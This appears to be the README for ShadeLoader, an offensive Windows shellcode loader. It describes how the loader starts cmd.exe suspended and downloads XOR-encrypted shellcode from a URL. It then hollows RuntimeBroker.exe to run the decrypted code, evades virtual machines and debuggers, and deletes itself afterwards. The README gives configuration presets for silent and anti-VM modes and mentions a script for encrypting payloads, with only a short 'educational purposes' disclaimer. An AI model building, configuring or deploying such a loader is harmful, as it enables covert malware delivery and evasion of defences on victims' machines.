ShadeLoader is a shellcode loader that utilizes process hollowing and XOR encryption techniques to download, decrypt, and inject shellcode into a legitimate process.
Initial Access (main.exe):
main.exe
starts a legitimate process, cmd.exe
, in suspended mode.Downloading and Decrypting Shellcode:
cmd.exe
downloads the encrypted shellcode from a specified URL.cmd.exe
decrypts the shellcode using a key to obtain the clear executable code.Process Hollowing (Injection into RuntimeBroker.exe):
cmd.exe
creates a new process, RuntimeBroker.exe
, in suspended mode.RuntimeBroker.exe
.cmd.exe
creates a thread in RuntimeBroker.exe
to execute the injected shellcode.Self-destruction:
main.exe
self-destructs.VM Protection and Anti-Debugging
The shellcode loader detect and protect against virtual machine environments and debugging tools.
you can setup shellcode loader 0 = disable | 1 = enable
ENABLE_DEBUG 0 // if enable its open windows with debug logs
AUTODESTRUCT 1 // auto destuct after execution
SUSPEND_DOWNLOAD 1 // waiting time before download shellcode from web
PROTECTION 1 // anti VM / disable IF YOU USE IN ON VM !!!
in main file you need to configure 2 think
The encrypt.py
file is included in the project. You can use it to encrypt your shellcode before uploading it.
Debug mode
#define ENABLE_DEBUG 1
#define AUTODESTRUCT 1
#define SUSPEND_DOWNLOAD 0
#define PROTECTION 0
Anti VM
#define ENABLE_DEBUG 1
#define AUTODESTRUCT 1
#define SUSPEND_DOWNLOAD 0
#define PROTECTION 1
Silent
#define ENABLE_DEBUG 0
#define AUTODESTRUCT 1
#define SUSPEND_DOWNLOAD 1
#define PROTECTION 0
https://kleenscan.com/scan_result/e116638a3bac264968b2a86f32e6a24db53f7f27335810caba68233ca5771e4d
This project is for educational purposes only. Any malicious use of this code is strictly prohibited